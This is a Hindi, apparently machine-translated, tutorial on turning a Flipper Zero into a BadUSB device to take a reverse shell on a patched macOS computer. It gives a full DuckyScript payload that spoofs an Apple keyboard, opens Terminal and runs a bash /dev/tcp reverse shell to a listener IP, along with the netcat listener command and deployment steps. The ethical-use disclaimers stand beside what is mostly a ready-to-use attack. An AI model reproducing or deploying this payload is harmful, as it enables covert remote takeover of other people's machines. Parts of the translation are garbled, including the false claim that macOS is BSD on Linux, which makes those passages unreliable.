फ़्लिपर ज़ीरो, एक छोटी 12-लाइन वाली डकीस्क्रिप्ट टेक्स्ट फ़ाइल और मेरे उबंटु सर्वर पर एक दूरस्थ श्रोता का उपयोग करके मैं अपने पूरी तरह से पैच किए गए, अप-टू-डेट वेंचुरा macOS कंप्यूटर पर एक शेल हासिल करने में सक्षम था। अपने प्रयोगशाला वातावरण में, मैं अपने सर्वर और डेस्कटॉप सिस्टम में कमजोरियों का परीक्षण करने के लिए फ्लिपर ज़ीरो को एक पेन्टिंग डिवाइस के रूप में उपयोग करता हूं। फ़्लिपर ज़ीरो हमारा पसंदीदा एथिकल हैकिंग टूल है क्योंकि यह अंतहीन संख्या में उपलब्ध पेलोड प्रदान करता है, इसमें ऑन-स्क्रीन मेनू चयन टूल है, और फीडबैक प्रदान करने के लिए प्रगति डिस्प्ले का उपयोग करता है। यह लेख इस बात का उदाहरण है कि फ़्लिपर ज़ीरो को एथिकल पेंटेस्टिंग बैडयूएसबी डिवाइस के रूप में कैसे इस्तेमाल किया जाए और इस तरह के शोषण का शिकार बनने से कैसे बचा जाए। इसका उपयोग उन कंप्यूटरों पर न करें जिनके आप स्वामी नहीं हैं या जिन्हें उपयोग करने की अनुमति नहीं है। यह कोड इंट्रूज़न डिटेक्शन सिस्टम्स (IDS), इंट्रूज़न प्रिवेंशन सिस्टम्स (IPS), नेटवर्क डिटेक्शन सिस्टम्स, फ़ायरवॉल या एंटी-वायरस (AV) सॉफ़्टवेयर से छिपाने का प्रयास नहीं करता है। बैडयूएसबी पेलोड फ़्लिपर ज़ीरो बैडयूएसबी और साथ ही कई अन्य बैडयूएसबी डिवाइस डकीस्क्रिप्ट में लिखे पेलोड का उपयोग करते हैं। कीबोर्ड इंजेक्शन हमले के परिणामस्वरूप कीस्ट्रोक करने के लिए एक सरल स्क्रिप्टिंग भाषा। डकीस्क्रिप्ट पेलोड के लिए एक अच्छा प्रारंभिक संदर्भ बिंदु आधिकारिक Hak5 वेबसाइट है: . यहां आपको डकस्क्रिप्ट का उपयोग करने के उदाहरण और दस्तावेज मिलेंगे। https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky आइए कुछ डकीस्क्रिप्ट लिखें आप पहले से तैयार स्क्रिप्ट का उपयोग कर सकते हैं, या आप अपनी खुद की स्क्रिप्ट लिखना सीख सकते हैं। हम आपको एक सरल चरण-दर-चरण पूर्वाभ्यास में macOS कंप्यूटर पर रिवर्स शेल का उपयोग करने का तरीका दिखाएंगे। अपने पसंदीदा पाठ संपादक का उपयोग करें और निम्न पाठ दर्ज करें। macOS में डिफ़ॉल्ट रूप से TextEdit एप्लिकेशन इंस्टॉल होता है, इसलिए हम उसका उपयोग करेंगे। ID 05ac:021e Apple:Keyboard DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 200 ENTER DELAY 1000 STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 DELAY 1000 ENTER DELAY 1000 इस पूर्वाभ्यास के लिए हमें डकीस्क्रिप्ट के बारे में बहुत कुछ जानने की आवश्यकता नहीं है, इसलिए हम उन कुछ कमांडों के बारे में जानेंगे जिनका उपयोग हमारी स्क्रिप्ट करती है। वास्तव में केवल पाँच अलग-अलग कमांड हैं जिनका हम उपयोग करते हैं। आज्ञा विवरण आईडी 05एसी: 021ई ऐप्पल: कीबोर्ड यह लाइन macOS को बताती है कि हमारा Flipper Zero वास्तव में एक Apple कीबोर्ड है। यदि आप इस लाइन का उपयोग नहीं करते हैं, तो macOS कीबोर्ड सेटअप असिस्टेंट डायलॉग प्रदर्शित करता है जिससे आपकी स्क्रिप्ट विफल हो जाएगी। देरी यह कमांड ऑपरेटिंग सिस्टम को कुछ समय के लिए प्रतीक्षा करने का निर्देश देता है। यदि हम इन विलंबों का उपयोग नहीं करते हैं, तो स्क्रिप्ट बहुत तेजी से चलेगी और विफल हो जाएगी। जीयूआई स्पेस 'स्पॉटलाइट सर्च' विंडो खोलने के लिए Apple कमांड की और स्पेस बार दबाता है। STRING टर्मिनल स्पॉटलाइट खोज विंडो में स्ट्रिंग 'टर्मिनल' दर्ज करता है प्रवेश करना अपने कीबोर्ड पर ENTER या रिटर्न कुंजी दबाएं। ENTER कुंजी दबाने के बाद, macOS टर्मिनल विंडो (/एप्लीकेशन/यूटिलिटीज/टर्मिनल) लॉन्च करता है STRING बैश -i >& /dev/tcp/10.10.10.157/4444 0>&1 यह आदेश टेक्स्ट को टर्मिनल विंडो में प्रवेश करता है जो पोर्ट 4444 पर 10.10.10.157 पर सुनने वाले नेटकैट सर्वर से कनेक्शन स्थापित करता है IP पता पर बदलें और पोर्ट को अपने सर्वर के IP पते और पोर्ट में बदलें। 10.10.10.157 4444 इस फ़ाइल को अपनी डिस्क पर के रूप में सहेजें। Flipper Zero पर डायरेक्टरी के तहत कोई उपनिर्देशिका संगठन नहीं है, इसलिए यदि आप विभिन्न ऑपरेटिंग सिस्टम के लिए कई पेलोड का उपयोग कर रहे हैं, तो एक नामकरण सम्मेलन का उपयोग करें जो आपके लिए कुछ मायने रखता है ताकि आप जान सकें कि यह क्या करता है। rev_shell_macos.txt badusb qflipper एप्लिकेशन इंस्टॉल करना यदि आपने अभी तक क्यूफ्लिपर एप्लिकेशन इंस्टॉल नहीं किया है, तो आधिकारिक फ्लिपर जीरो अपडेट पेज पर जाएं और अपने ऑपरेटिंग सिस्टम के लिए इंस्टॉलर का चयन करें। पेज फर्मवेयर अपडेट पेज है, लेकिन नीचे क्यूफ्लिपर एप्लिकेशन इंस्टॉल करने के लिए लिंक हैं। https://flipperzero.one/update https://flipperzero.one/update?embedable=true qflipper एप्लिकेशन इंस्टॉल करने के लिए अपने ऑपरेटिंग सिस्टम के निर्देशों का पालन करें। फ्लिपर जीरो पर डकीस्क्रिप्ट प्राप्त करना qflipper एप्लिकेशन खोलें और लाल रंग में हाइलाइट किए गए फ़ोल्डर आइकन का चयन करें। सामग्री देखने के लिए आइकन का चयन करें और डबल-क्लिक करें। एसडी कार्ड हमारे द्वारा पहले बनाई गई फ़ाइल को फ़ोल्डर में ढूंढें और खींचें। Rev_shell_macos.txt Badusb जब फाइल कॉपी हो जाए तो अपने कंप्यूटर से Flipper Zero को हटा दें। उलटे खोल का इंतजार है फ़्लिपर ज़ीरो बैडयूएसबी सुसज्जित है और उपयोग के लिए तैयार है। लेकिन सबसे पहले, हमें अपने रिमोट श्रोता को अपने सर्वर पर स्थापित करने की आवश्यकता है। हमारे Ubuntu सर्वर पर, Netcat श्रोता को निम्नलिखित कमांड से शुरू करें: $ nc -nlvp 4444 कमांड का ब्रेकडाउन निम्न तालिका में सूचीबद्ध है। आने वाले कनेक्शन की प्रतीक्षा करने के अलावा, आपको वास्तव में यह जानने की ज़रूरत नहीं है कि इस कमांड का उपयोग करने पर क्या हो रहा है। आज्ञा विकल्प एनसी नेटकैट कमांड -एनएलवीपी ( ) कोई DNS रिज़ॉल्यूशन नहीं, ( ) आने वाले कनेक्शन के लिए सुनें, ( ) वर्बोज़ आउटपुट, ( ) पोर्ट n l v p 4444 सुनने के लिए पोर्ट नंबर अब जब हमारा नेटकैट श्रोता तैयार है और आने वाले कनेक्शन की प्रतीक्षा कर रहा है, तो हम फ्लिपर ज़ीरो बैडयूएसबी हमले के साथ आगे बढ़ सकते हैं। बैडयूएसबी रिवर्स शेल शुरू करना कठिन हिस्सा किया जाता है। फ़्लिपर ज़ीरो बैडयूएसबी फ़ाइल लिखी गई है, फ़्लिपर ज़ीरो में ले जाया गया है, और नेटकैट श्रोता एक कनेक्शन की प्रतीक्षा कर रहा है। रिवर्स_शेल_मैकोस.टीएक्सटी खराब USB मेनू का पता लगाएँ और रन बटन का चयन करें। अभी तक अपने Flipper Zero को अपने कंप्यूटर से कनेक्ट न करें। फ़्लिपर ज़ीरो आपको बताएगा कि आपके डिवाइस को कनेक्ट करने का समय कब है। उस डकीस्क्रिप्ट फ़ाइल पर नेविगेट करें जिसे हमने पिछले चरण में कॉपी किया था। अगर आपको यह फ़ाइल दिखाई नहीं देती है तो आपने इसे गलत निर्देशिका में कॉपी किया है। चुनें और रन बटन पर क्लिक करें। Rev_shell_macos जब आप अलर्ट देखते हैं, तो आप अपने Flipper Zero को अपने iMac या MacBook के USB पोर्ट से कनेक्ट कर सकते हैं। रन बटन पर क्लिक करें। Connect to USB आप मुख्य विंडो में अपने BadUSB स्क्रिप्ट की प्रगति देख सकते हैं। एक बार जब स्थिति 100% तक पहुंच जाती है तो पेलोड पूरा हो जाता है और आप फ्लिपर जीरो को हटा सकते हैं। यदि आप iMac के कंप्यूटर के मॉनिटर को देख रहे हैं तो आप शोषण देख सकते हैं क्योंकि यह डकीस्क्रिप्ट को निष्पादित करता है। हमारे उबंटू सर्वर पर नेटकैट श्रोता सफल अनुरोध के परिणाम प्रदर्शित करता है। आपके कंप्यूटर का नियंत्रण अब आपके पास रिवर्स शेल के माध्यम से macOS कंप्यूटर का नियंत्रण है। बीएसडी लिनक्स के एक संस्करण पर चल रहा है, आप यूनिक्स कमांड लाइन टूल्स और बाश खोल का उपयोग कर सकते हैं जैसे कि आप भौतिक आईमैक के कीबोर्ड पर बैठे थे। आप फ़ाइल सिस्टम को नेविगेट करने और ऑपरेटिंग सिस्टम में हेरफेर करने के लिए नियमित लिनक्स कमांड जैसे कि , , , या का उपयोग कर सकते हैं। whoami pwd ls cd अगले कदम अब जब आपको यह समझ आ गया है कि फ़्लिपर ज़ीरो एक बैडयूएसबी डिवाइस के रूप में कैसे काम करता है, तो आप अपनी खुद की स्क्रिप्ट बना सकते हैं। Hak5 साइट या Google खोज के माध्यम से उपलब्ध कई डकीस्क्रिप्ट गिटहब रिपॉजिटरी में से एक का उपयोग अपनी खुद की डकीस्क्रिप्ट फ़ाइलों के लिए शुरुआती बिंदु के रूप में करें। कानूनी और नैतिक रूप से कार्य करें। इस उपकरण का उपयोग उन उपकरणों पर करें जिनके आप स्वामी हैं या जिनके पास उपयोग करने की अनुमति है।
